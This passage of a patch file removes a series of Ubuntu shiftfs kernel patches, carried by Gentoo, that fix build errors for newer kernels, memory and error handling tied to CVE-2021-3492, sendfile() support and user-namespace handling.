<seth.forshee@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 4 ---- - 1 file changed, 4 deletions(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index f9a5c94a9793..3cfd1881e9a2 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -252,8 +252,6 @@ static int shiftfs_d_weak_revalidate(struct dentry *dentry, unsigned int flags) - struct inode *loweri = d_inode(lowerd); - - shiftfs_copyattr(loweri, inode); -- if (!inode->i_nlink) -- err = 0; - } - - return err; -@@ -279,8 +277,6 @@ static int shiftfs_d_revalidate(struct dentry *dentry, unsigned int flags) - struct inode *loweri = d_inode(lowerd); - - shiftfs_copyattr(loweri, inode); -- if (!inode->i_nlink) -- err = 0; - } - - return err; --- -2.39.2 - -From 21c3ebac069050649a03a1e9d5f2fd4c895fc6cd Mon Sep 17 00:00:00 2001 -From: Andrea Righi <andrea.righi@canonical.com> -Date: Wed, 30 Dec 2020 11:10:20 +0100 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix build error with 5.11 -Cc: mpagano@gentoo.org - -After commit: - - 8760c909f54a82aaa6e76da19afe798a0c77c3c3 ("file: Rename __close_fd to close_fd and remove the files parameter") - -__close_fd() has been renamed to close_fd() and the files parameter has -been removed. - -Change the shiftfs code to properly support this change. - -Signed-off-by: Andrea Righi <andrea.righi@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 4 ++-- - 1 file changed, 2 insertions(+), 2 deletions(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index 3cfd1881e9a2..4f1d94903557 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -1420,7 +1420,7 @@ static int shiftfs_btrfs_ioctl_fd_restore(int cmd, int fd, void __user *arg, - else - ret = copy_to_user(arg, v2, sizeof(*v2)); - -- __close_fd(current->files, fd); -+ close_fd(fd); - kfree(v1); - kfree(v2); - -@@ -1468,7 +1468,7 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg, - /* - * shiftfs_real_fdget() does not take a reference to lfd.file, so - * take a reference here to offset the one which will be put by -- * __close_fd(), and make sure that reference is put on fdput(lfd). -+ * close_fd(), and make sure that reference is put on fdput(lfd). - */ - get_file(lfd.file); - lfd.flags |= FDPUT_FPUT; --- -2.39.2 - -From c0ebd52879a8805e07e59a25e72bce73e2ddcd90 Mon Sep 17 00:00:00 2001 -From: Seth Forshee <seth.forshee@canonical.com> -Date: Fri, 9 Apr 2021 13:01:06 -0500 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: free allocated memory in - shiftfs_btrfs_ioctl_fd_replace() error paths -Cc: mpagano@gentoo.org - -Many error paths in shiftfs_btrfs_ioctl_fd_replace() do not free memory -allocated near the top of the function. Fix up these error paths to free -the memory. - -Additionally, the addresses for the allocated memory are assigned to -return parameters early in the function, before we know whether or not -the function as a whole will return success. Wait to assign these values -until we know the function was successful, and for good measure -initialize the return parameters to NULL at the start. - -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -CVE-2021-3492 -Signed-off-by: Thadeu Lima de Souza Cascardo <cascardo@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 28 +++++++++++++++++++++------- - 1 file changed, 21 insertions(+), 7 deletions(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index 4f1d94903557..8eab93691d62 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -1438,6 +1438,9 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg, - struct btrfs_ioctl_vol_args *v1 = NULL; - struct btrfs_ioctl_vol_args_v2 *v2 = NULL; - -+ *b1 = NULL; -+ *b2 = NULL; -+ - if (!is_btrfs_snap_ioctl(cmd)) - return 0; - -@@ -1446,23 +1449,23 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg, - if (IS_ERR(v1)) - return PTR_ERR(v1); - oldfd = v1->fd; -- *b1 = v1; - } else { - v2 = memdup_user(arg, sizeof(*v2)); - if (IS_ERR(v2)) - return PTR_ERR(v2); - oldfd = v2->fd; -- *b2 = v2; - } - - src = fdget(oldfd); -- if (!src.file) -- return -EINVAL; -+ if (!src.file) { -+ ret = -EINVAL; -+ goto err_free; -+ } - - ret = shiftfs_real_fdget(src.file, &lfd); - if (ret) { - fdput(src); -- return ret; -+ goto err_free; - } - - /* -@@ -1477,7 +1480,8 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg, - *newfd = get_unused_fd_flags(lfd.file->f_flags); - if (*newfd < 0) { - fdput(lfd); -- return *newfd; -+ ret = *newfd; -+ goto err_free; - } - - fd_install(*newfd, lfd.file); -@@ -1492,8 +1496,18 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg, - v2->fd = oldfd; - } - -- if (ret) -+ if (!ret) { -+ *b1 = v1; -+ *b2 = v2; -+ } else { - shiftfs_btrfs_ioctl_fd_restore(cmd, *newfd, arg, v1, v2); -+ } -+ -+ return ret; -+ -+err_free: -+ kfree(v1); -+ kfree(v2); - - return ret; - } --- -2.39.2 - -From f0a7637da44fdf17351c0ba4c3f616941c749f57 Mon Sep 17 00:00:00 2001 -From: Seth Forshee <seth.forshee@canonical.com> -Date: Fri, 9 Apr 2021 13:10:37 -0500 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: handle copy_to_user() return values - correctly -Cc: mpagano@gentoo.org - -shiftfs expects copy_to_user() to return a negative error code on -failure, when it actually returns the amount of uncopied data. Fix all -code using copy_to_user() to handle the return values correctly. - -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -CVE-2021-3492 -Signed-off-by: Thadeu Lima de Souza Cascardo <cascardo@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 3 ++- - 1 file changed, 2 insertions(+), 1 deletion(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index 8eab93691d62..abeb7db3b9be 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -1424,7 +1424,7 @@ static int shiftfs_btrfs_ioctl_fd_restore(int cmd, int fd, void __user *arg, - kfree(v1); - kfree(v2); - -- return ret; -+ return ret ? -EFAULT: 0; - } - - static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg, -@@ -1501,6 +1501,7 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg, - *b2 = v2; - } else { - shiftfs_btrfs_ioctl_fd_restore(cmd, *newfd, arg, v1, v2); -+ ret = -EFAULT; - } - - return ret; --- -2.39.2 - -From d2e7abdd84fb28842c61ffd7128977f29518e4ef Mon Sep 17 00:00:00 2001 -From: Christian Brauner <christian.brauner@ubuntu.com> -Date: Mon, 9 Aug 2021 17:15:28 +0200 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix sendfile() invocations -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1939301 - -Upstream commit 36e2c7421f02 ("fs: don't allow splice read/write without explicit ops") -caused a regression for us. It states: - -> default_file_splice_write is the last piece of generic code that uses -> set_fs to make the uaccess routines operate on kernel pointers. It -> implements a "fallback loop" for splicing from files that do not actually -> provide a proper splice_read method. The usual file systems and other -> high bandwidth instances all provide a ->splice_read, so this just removes -> support for various device drivers and procfs/debugfs files. If splice -> support for any of those turns out to be important it can be added back -> by switching them to the iter ops and using generic_file_splice_read. - -this means that currently all workloads making use of sendfile() on -shiftfs fail. This includes LXD, Anbox and a range of others. Fix this -by providing explicit .splice_read() and .splice_write() methods which -jus restores the status quo and we keep using a generic method provided -by the vfs. - -Cc: Seth Forshee <sforshee@kernel.org> -Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com> -Signed-off-by: Paolo Pisati <paolo.pisati@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 2 ++ - 1 file changed, 2 insertions(+) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index abeb7db3b9be..f5f6d8d8144e 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -1737,6 +1737,8 @@ const struct file_operations shiftfs_file_operations = { - .compat_ioctl = shiftfs_compat_ioctl, - .copy_file_range = shiftfs_copy_file_range, - .remap_file_range = shiftfs_remap_file_range, -+ .splice_read = generic_file_splice_read, -+ .splice_write = iter_file_splice_write, - }; - - const struct file_operations shiftfs_dir_operations = { --- -2.39.2 - -From ff28712d9e52b3b0b2127e9898b96f7c1e11bd26 Mon Sep 17 00:00:00 2001 -From: Andrea Righi <andrea.righi@canonical.com> -Date: Thu, 20 Jan 2022 16:55:24 +0100 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: support kernel 5.15 -Cc: mpagano@gentoo.org - -WARNING: after this change we may see some regressions if shiftfs is -used with filesystem namespaces. - -Signed-off-by: Andrea Righi <andrea.righi@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 107 ++++++++++++++++++++++++++++++--------------------- - 1 file changed, 64 insertions(+), 43 deletions(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index f5f6d8d8144e..76c54bc12018 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -308,7 +308,8 @@ static const char *shiftfs_get_link(struct dentry *dentry, struct inode *inode, - return p; - } - --static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode, -+static int shiftfs_setxattr(struct user_namespace *ns, -+ struct dentry *dentry, struct inode *inode, - const char *name, const void *value, - size_t size, int flags) - { -@@ -317,7 +318,7 @@ static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode, - const struct cred *oldcred; - - oldcred = shiftfs_override_creds(dentry->d_sb); -- err = vfs_setxattr(lowerd, name, value, size, flags); -+ err = vfs_setxattr(ns, lowerd, name, value, size, flags); - revert_creds(oldcred); - - shiftfs_copyattr(lowerd->d_inode, inode); -@@ -334,7 +335,7 @@ static int shiftfs_xattr_get(const struct xattr_handler *handler, - const struct cred *oldcred; - - oldcred = shiftfs_override_creds(dentry->d_sb); -- err = vfs_getxattr(lowerd, name, value, size); -+ err = vfs_getxattr(&init_user_ns, lowerd, name, value, size); - revert_creds(oldcred); - - return err; -@@ -354,14 +355,15 @@ static ssize_t shiftfs_listxattr(struct dentry *dentry, char *list, - return err; - } - --static int shiftfs_removexattr(struct dentry *dentry, const char *name) -+static int shiftfs_removexattr(struct user_namespace *ns, -+ struct dentry *dentry, const char *name) - { - struct dentry *lowerd = dentry->d_fsdata; - int err; - const struct cred *oldcred; - - oldcred = shiftfs_override_creds(dentry->d_sb); -- err = vfs_removexattr(lowerd, name); -+ err = vfs_removexattr(ns, lowerd, name); - revert_creds(oldcred); - - /* update c/mtime */ -@@ -371,13 +373,14 @@ static int shiftfs_removexattr(struct dentry *dentry, const char *name) - } - - static int shiftfs_xattr_set(const struct xattr_handler *handler, -+ struct user_namespace *ns, - struct dentry *dentry, struct inode *inode, - const char *name, const void *value, size_t size, - int flags) - { - if (!value) -- return shiftfs_removexattr(dentry, name); -- return shiftfs_setxattr(dentry, inode, name, value, size, flags); -+ return shiftfs_removexattr(ns, dentry, name); -+ return shiftfs_setxattr(ns, dentry, inode, name, value, size, flags); - } - - static int shiftfs_inode_test(struct inode *inode, void *data) -@@ -391,7 +394,8 @@ static int shiftfs_inode_set(struct inode *inode, void *data) - return 0; - } - --static int shiftfs_create_object(struct inode *diri, struct dentry *dentry, -+static int shiftfs_create_object(struct user_namespace *ns, -+ struct inode *diri, struct dentry *dentry, - umode_t mode, const char *symlink, - struct dentry *hardlink, bool excl) - { -@@ -453,7 +457,7 @@ static int shiftfs_create_object(struct inode *diri, struct dentry *dentry, - inode->i_state |= I_CREATING; - spin_unlock(&inode->i_lock); - -- inode_init_owner(inode, diri, mode); -+ inode_init_owner(ns, inode, diri, mode); - modei = inode->i_mode; - } - -@@ -464,22 +468,22 @@ static int shiftfs_create_object(struct inode *diri, struct dentry *dentry, - - if (hardlink) { - lowerd_link = hardlink->d_fsdata; -- err = vfs_link(lowerd_link, loweri_dir, lowerd_new, NULL); -+ err = vfs_link(lowerd_link, ns, loweri_dir, lowerd_new, NULL); - } else { - switch (modei & S_IFMT) { - case S_IFDIR: -- err = vfs_mkdir(loweri_dir, lowerd_new, modei); -+ err = vfs_mkdir(ns, loweri_dir, lowerd_new, modei); - break; - case S_IFREG: -- err = vfs_create(loweri_dir, lowerd_new, modei, excl); -+ err = vfs_create(ns, loweri_dir, lowerd_new, modei, excl); - break; - case S_IFLNK: -- err = vfs_symlink(loweri_dir, lowerd_new, symlink); -+ err = vfs_symlink(ns, loweri_dir, lowerd_new, symlink); - break; - case S_IFSOCK: - /* fall through */ - case S_IFIFO: -- err = vfs_mknod(loweri_dir, lowerd_new, modei, 0); -+ err = vfs_mknod(ns, loweri_dir, lowerd_new, modei, 0); - break; - default: - err = -EINVAL; -@@ -535,41 +539,43 @@ static int shiftfs_create_object(struct inode *diri, struct dentry *dentry, - return err; - } - --static int shiftfs_create(struct inode *dir, struct dentry *dentry, -+static int shiftfs_create(struct user_namespace *ns, -+ struct inode *dir, struct dentry *dentry, - umode_t mode, bool excl) - { - mode |= S_IFREG; - -- return shiftfs_create_object(dir, dentry, mode, NULL, NULL, excl); -+ return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, excl); - } - --static int shiftfs_mkdir(struct inode *dir, struct dentry *dentry, -+static int shiftfs_mkdir(struct user_namespace *ns, struct inode *dir, struct dentry *dentry, - umode_t mode) - { - mode |= S_IFDIR; - -- return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false); -+ return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, false); - } - - static int shiftfs_link(struct dentry *hardlink, struct inode *dir, - struct dentry *dentry) - { -- return shiftfs_create_object(dir, dentry, 0, NULL, hardlink, false); -+ return shiftfs_create_object(&init_user_ns, dir, dentry, 0, NULL, hardlink, false); - } - --static int shiftfs_mknod(struct inode *dir, struct dentry *dentry, umode_t mode, -+static int shiftfs_mknod(struct user_namespace *ns, -+ struct inode *dir, struct dentry *dentry, umode_t mode, - dev_t rdev) - { - if (!S_ISFIFO(mode) && !S_ISSOCK(mode)) - return -EPERM; - -- return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false); -+ return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, false); - } - --static int shiftfs_symlink(struct inode *dir, struct dentry *dentry, -+static int shiftfs_symlink(struct user_namespace *ns, struct inode *dir, struct dentry *dentry, - const char *symlink) - { -- return shiftfs_create_object(dir, dentry, S_IFLNK, symlink, NULL, false); -+ return shiftfs_create_object(ns, dir, dentry, S_IFLNK, symlink, NULL, false); - } - - static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir) -@@ -584,9 +590,9 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir) - oldcred = shiftfs_override_creds(dentry->d_sb); - inode_lock_nested(loweri, I_MUTEX_PARENT); - if (rmdir) -- err = vfs_rmdir(loweri, lowerd); -+ err = vfs_rmdir(&init_user_ns, loweri, lowerd); - else -- err = vfs_unlink(loweri, lowerd, NULL); -+ err = vfs_unlink(&init_user_ns, loweri, lowerd, NULL); - revert_creds(oldcred); - - if (!err) { -@@ -615,7 +621,8 @@ static int shiftfs_rmdir(struct inode *dir, struct dentry *dentry) - return shiftfs_rm(dir, dentry, true); - } - --static int shiftfs_rename(struct inode *olddir, struct dentry *old, -+static int shiftfs_rename(struct user_namespace *ns, -+ struct inode *olddir, struct dentry *old, - struct inode *newdir, struct dentry *new, - unsigned int flags) - { -@@ -625,6 +632,14 @@ static int shiftfs_rename(struct inode *olddir, struct dentry *old, - *trapd; - struct inode *loweri_dir_old = lowerd_dir_old->d_inode, - *loweri_dir_new = lowerd_dir_new->d_inode; -+ struct renamedata rd = { -+ .old_mnt_userns = ns, -+ .old_dir = loweri_dir_old, -+ .old_dentry = lowerd_old, -+ .new_mnt_userns = ns, -+ .new_dir = loweri_dir_new, -+ .new_dentry = lowerd_new, -+ }; - int err = -EINVAL; - const struct cred *oldcred; - -@@ -634,8 +649,7 @@ static int shiftfs_rename(struct inode *olddir, struct dentry *old, - goto out_unlock; - - oldcred = shiftfs_override_creds(old->d_sb); -- err = vfs_rename(loweri_dir_old, lowerd_old, loweri_dir_new, lowerd_new, -- NULL, flags); -+ err = vfs_rename(&rd); - revert_creds(oldcred); - - shiftfs_copyattr(loweri_dir_old, olddir); -@@ -691,7 +705,7 @@ static struct dentry *shiftfs_lookup(struct inode *dir, struct dentry *dentry, - return d_splice_alias(inode, dentry); - } - --static int shiftfs_permission(struct inode *inode, int mask) -+static int shiftfs_permission(struct user_namespace *ns, struct inode *inode, int mask) - { - int err; - const struct cred *oldcred; -@@ -702,12 +716,12 @@ static int shiftfs_permission(struct inode *inode, int mask) - return -ECHILD; - } - -- err = generic_permission(inode, mask); -+ err = generic_permission(ns, inode, mask); - if (err) - return err; - - oldcred = shiftfs_override_creds(inode->i_sb); -- err = inode_permission(loweri, mask); -+ err = inode_permission(ns, loweri, mask); - revert_creds(oldcred); - - return err; -@@ -733,7 +747,8 @@ static int shiftfs_fiemap(struct inode *inode, - return err; - } - --static int shiftfs_tmpfile(struct inode *dir, struct dentry *dentry, -+static int shiftfs_tmpfile(struct user_namespace *ns, -+ struct inode *dir, struct dentry *dentry, - umode_t mode) - { - int err; -@@ -745,13 +760,13 @@ static int shiftfs_tmpfile(struct inode *dir, struct dentry *dentry, - return -EOPNOTSUPP; - - oldcred = shiftfs_override_creds(dir->i_sb); -- err = loweri->i_op->tmpfile(loweri, lowerd, mode); -+ err = loweri->i_op->tmpfile(ns, loweri, lowerd, mode); - revert_creds(oldcred); - - return err; - } - --static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr) -+static int shiftfs_setattr(struct user_namespace *ns, struct dentry *dentry, struct iattr *attr) - { - struct dentry *lowerd = dentry->d_fsdata; - struct inode *loweri = lowerd->d_inode; -@@ -761,7 +776,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr) - struct shiftfs_super_info *sbinfo = sb->s_fs_info; - int err; - -- err = setattr_prepare(dentry, attr); -+ err = setattr_prepare(ns, dentry, attr); - if (err) - return err; - -@@ -778,7 +793,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr) - - inode_lock(loweri); - oldcred = shiftfs_override_creds(dentry->d_sb); -- err = notify_change(lowerd, &newattr, NULL); -+ err = notify_change(ns, lowerd, &newattr, NULL); - revert_creds(oldcred); - inode_unlock(loweri); - -@@ -787,7 +802,8 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr) - return err; - } - --static int shiftfs_getattr(const struct path *path, struct kstat *stat, -+static int shiftfs_getattr(struct user_namespace *ns, -+ const struct path *path, struct kstat *stat, - u32 request_mask, unsigned int query_flags) - { - struct inode *inode = path->dentry->d_inode; -@@ -870,9 +886,9 @@ shift_acl_xattr_ids(struct user_namespace *from, struct user_namespace *to, - entry->e_id = cpu_to_le32(from_kuid(&init_user_ns, kuid)); - break; - case ACL_GROUP: -- kgid = make_kgid(&init_user_ns, le32_to_cpu(entry->e_id)); -+ kgid = make_kgid(from, le32_to_cpu(entry->e_id)); - kgid = shift_kgid(from, to, kgid); -- entry->e_id = cpu_to_le32(from_kgid(&init_user_ns, kgid)); -+ entry->e_id = cpu_to_le32(from_kgid(from, kgid)); - break; - default: - break; -@@ -880,7 +896,8 @@ shift_acl_xattr_ids(struct user_namespace *from, struct user_namespace *to, - } - } - --static struct posix_acl *shiftfs_get_acl(struct inode *inode, int type) -+static struct posix_acl * -+shiftfs_get_acl(struct inode *inode, int type, bool rcu) - { - struct inode *loweri = inode->i_private; - const struct cred *oldcred; -@@ -890,6 +907,9 @@ static struct posix_acl *shiftfs_get_acl(struct inode *inode, int type) - int size; - int err; - -+ if (rcu) -+ return ERR_PTR(-ECHILD); -+ - if (!IS_POSIXACL(loweri)) - return NULL; - -@@ -941,6 +961,7 @@ shiftfs_posix_acl_xattr_get(const struct xattr_handler *handler, - - static int - shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler, -+ struct user_namespace *ns, - struct dentry *dentry, struct inode *inode, - const char *name, const void *value, - size_t size, int flags) -@@ -952,17 +973,17 @@ shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler, - return -EOPNOTSUPP; - if (handler->flags == ACL_TYPE_DEFAULT && !S_ISDIR(inode->i_mode)) - return value ? -EACCES : 0; -- if (!inode_owner_or_capable(inode)) -+ if (!inode_owner_or_capable(ns, inode)) - return -EPERM; - - if (value) { - shift_acl_xattr_ids(inode->i_sb->s_user_ns, - loweri->i_sb->s_user_ns, - (void *)value, size); -- err = shiftfs_setxattr(dentry, inode, handler->name, value, -+ err = shiftfs_setxattr(ns, dentry, inode, handler->name, value, - size, flags); - } else { -- err = shiftfs_removexattr(dentry, handler->name); -+ err = shiftfs_removexattr(ns, dentry, handler->name); - } - - if (!err) --- -2.39.2 - -From df4546ab77323af5bd40996244af7ade6c99054b Mon Sep 17 00:00:00 2001 -From: Andrea Righi <andrea.righi@canonical.com> -Date: Wed, 13 Apr 2022 15:26:22 +0200 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: always rely on init_user_ns -Cc: mpagano@gentoo.org - -With the porting of shiftfs from 5.15 to 5.17 some filesystem-related -functions are now passing struct user_namespace as argument, however -shiftfs logic is still relying on the fact that these functions need to -use the main filesystem namespace. - -Make sure to always use init_user_ns to prevent breakage of system -components that rely on shiftfs. - -Without this fix lxd was showing some issues, like failing to create any -file inside a container when shiftfs was used (e.g., using zfs as -storage pool). - -Signed-off-by: Andrea Righi <andrea.righi@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 50 ++++++++++++++++++++++++-------------------------- - 1 file changed, 24 insertions(+), 26 deletions(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index 76c54bc12018..a21624c529f0 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -308,8 +308,7 @@ static const char *shiftfs_get_link(struct dentry *dentry, struct inode *inode, - return p; - } - --static int shiftfs_setxattr(struct user_namespace *ns, -- struct dentry *dentry, struct inode *inode, -+static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode, - const char *name, const void *value, - size_t size, int flags) - { -@@ -318,7 +317,7 @@ static int shiftfs_setxattr(struct user_namespace *ns, - const struct cred *oldcred; - - oldcred = shiftfs_override_creds(dentry->d_sb); -- err = vfs_setxattr(ns, lowerd, name, value, size, flags); -+ err = vfs_setxattr(&init_user_ns, lowerd, name, value, size, flags); - revert_creds(oldcred); - - shiftfs_copyattr(lowerd->d_inode, inode); -@@ -363,7 +362,7 @@ static int shiftfs_removexattr(struct user_namespace *ns, - const struct cred *oldcred; - - oldcred = shiftfs_override_creds(dentry->d_sb); -- err = vfs_removexattr(ns, lowerd, name); -+ err = vfs_removexattr(&init_user_ns, lowerd, name); - revert_creds(oldcred); - - /* update c/mtime */ -@@ -379,8 +378,8 @@ static int shiftfs_xattr_set(const struct xattr_handler *handler, - int flags) - { - if (!value) -- return shiftfs_removexattr(ns, dentry, name); -- return shiftfs_setxattr(ns, dentry, inode, name, value, size, flags); -+ return shiftfs_removexattr(&init_user_ns, dentry, name); -+ return shiftfs_setxattr(dentry, inode, name, value, size, flags); - } - - static int shiftfs_inode_test(struct inode *inode, void *data) -@@ -394,8 +393,7 @@ static int shiftfs_inode_set(struct inode *inode, void *data) - return 0; - } - --static int shiftfs_create_object(struct user_namespace *ns, -- struct inode *diri, struct dentry *dentry, -+static int shiftfs_create_object(struct inode *diri, struct dentry *dentry, - umode_t mode, const char *symlink, - struct dentry *hardlink, bool excl) - { -@@ -457,7 +455,7 @@ static int shiftfs_create_object(struct user_namespace *ns, - inode->i_state |= I_CREATING; - spin_unlock(&inode->i_lock); - -- inode_init_owner(ns, inode, diri, mode); -+ inode_init_owner(&init_user_ns, inode, diri, mode); - modei = inode->i_mode; - } - -@@ -468,22 +466,22 @@ static int shiftfs_create_object(struct user_namespace *ns, - - if (hardlink) { - lowerd_link = hardlink->d_fsdata; -- err = vfs_link(lowerd_link, ns, loweri_dir, lowerd_new, NULL); -+ err = vfs_link(lowerd_link, &init_user_ns, loweri_dir, lowerd_new, NULL); - } else { - switch (modei & S_IFMT) { - case S_IFDIR: -- err = vfs_mkdir(ns, loweri_dir, lowerd_new, modei); -+ err = vfs_mkdir(&init_user_ns, loweri_dir, lowerd_new, modei); - break; - case S_IFREG: -- err = vfs_create(ns, loweri_dir, lowerd_new, modei, excl); -+ err = vfs_create(&init_user_ns, loweri_dir, lowerd_new, modei, excl); - break; - case S_IFLNK: -- err = vfs_symlink(ns, loweri_dir, lowerd_new, symlink); -+ err = vfs_symlink(&init_user_ns, loweri_dir, lowerd_new, symlink); - break; - case S_IFSOCK: - /* fall through */ - case S_IFIFO: -- err = vfs_mknod(ns, loweri_dir, lowerd_new, modei, 0); -+ err = vfs_mknod(&init_user_ns, loweri_dir, lowerd_new, modei, 0); - break; - default: - err = -EINVAL; -@@ -545,7 +543,7 @@ static int shiftfs_create(struct user_namespace *ns, - { - mode |= S_IFREG; - -- return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, excl); -+ return shiftfs_create_object(dir, dentry, mode, NULL, NULL, excl); - } - - static int shiftfs_mkdir(struct user_namespace *ns, struct inode *dir, struct dentry *dentry, -@@ -553,13 +551,13 @@ static int shiftfs_mkdir(struct user_namespace *ns, struct inode *dir, struct de - { - mode |= S_IFDIR; - -- return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, false); -+ return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false); - } - - static int shiftfs_link(struct dentry *hardlink, struct inode *dir, - struct dentry *dentry) - { -- return shiftfs_create_object(&init_user_ns, dir, dentry, 0, NULL, hardlink, false); -+ return shiftfs_create_object(dir, dentry, 0, NULL, hardlink, false); - } - - static int shiftfs_mknod(struct user_namespace *ns, -@@ -569,13 +567,13 @@ static int shiftfs_mknod(struct user_namespace *ns, - if (!S_ISFIFO(mode) && !S_ISSOCK(mode)) - return -EPERM; - -- return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, false); -+ return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false); - } - - static int shiftfs_symlink(struct user_namespace *ns, struct inode *dir, struct dentry *dentry, - const char *symlink) - { -- return shiftfs_create_object(ns, dir, dentry, S_IFLNK, symlink, NULL, false); -+ return shiftfs_create_object(dir, dentry, S_IFLNK, symlink, NULL, false); - } - - static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir) -@@ -716,12 +714,12 @@ static int shiftfs_permission(struct user_namespace *ns, struct inode *inode, in - return -ECHILD; - } - -- err = generic_permission(ns, inode, mask); -+ err = generic_permission(&init_user_ns, inode, mask); - if (err) - return err; - - oldcred = shiftfs_override_creds(inode->i_sb); -- err = inode_permission(ns, loweri, mask); -+ err = inode_permission(&init_user_ns, loweri, mask); - revert_creds(oldcred); - - return err; -@@ -760,7 +758,7 @@ static int shiftfs_tmpfile(struct user_namespace *ns, - return -EOPNOTSUPP; - - oldcred = shiftfs_override_creds(dir->i_sb); -- err = loweri->i_op->tmpfile(ns, loweri, lowerd, mode); -+ err = loweri->i_op->tmpfile(&init_user_ns, loweri, lowerd, mode); - revert_creds(oldcred); - - return err; -@@ -776,7 +774,7 @@ static int shiftfs_setattr(struct user_namespace *ns, struct dentry *dentry, str - struct shiftfs_super_info *sbinfo = sb->s_fs_info; - int err; - -- err = setattr_prepare(ns, dentry, attr); -+ err = setattr_prepare(&init_user_ns, dentry, attr); - if (err) - return err; - -@@ -793,7 +791,7 @@ static int shiftfs_setattr(struct user_namespace *ns, struct dentry *dentry, str - - inode_lock(loweri); - oldcred = shiftfs_override_creds(dentry->d_sb); -- err = notify_change(ns, lowerd, &newattr, NULL); -+ err = notify_change(&init_user_ns, lowerd, &newattr, NULL); - revert_creds(oldcred); - inode_unlock(loweri); - -@@ -980,10 +978,10 @@ shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler, - shift_acl_xattr_ids(inode->i_sb->s_user_ns, - loweri->i_sb->s_user_ns, - (void *)value, size); -- err = shiftfs_setxattr(ns, dentry, inode, handler->name, value, -+ err = shiftfs_setxattr(dentry, inode, handler->name, value, - size, flags); - } else { -- err = shiftfs_removexattr(ns, dentry, handler->name); -+ err = shiftfs_removexattr(&init_user_ns, dentry, handler->name); - } - - if (!err) --- -2.39.2 - -From 3d0ac0887b4a57d883d194a6836501fa77aaf6e3 Mon Sep 17 00:00:00 2001 -From: Andrea Righi <andrea.righi@canonical.com> -Date: Wed, 27 Apr 2022 18:20:41 +0200 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix missing include required in 5.18 -Cc: mpagano@gentoo.org - -Signed-off-by: Andrea Righi <andrea.righi@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 1 + - 1 file changed, 1 insertion(+) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index a21624c529f0..a5338dc6290c 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -21,6 +21,7 @@ - #include <linux/posix_acl_xattr.h> - #include <linux/uio.h> - #include <linux/fiemap.h> -+#include <linux/pagemap.h> - - struct shiftfs_super_info { - struct vfsmount *mnt; --- -2.39.2 - -From 6cbfd564842eeb9adb495a3de704d125418825f9 Mon Sep 17 00:00:00 2001 -From: Andrea Righi <andrea.righi@canonical.com> 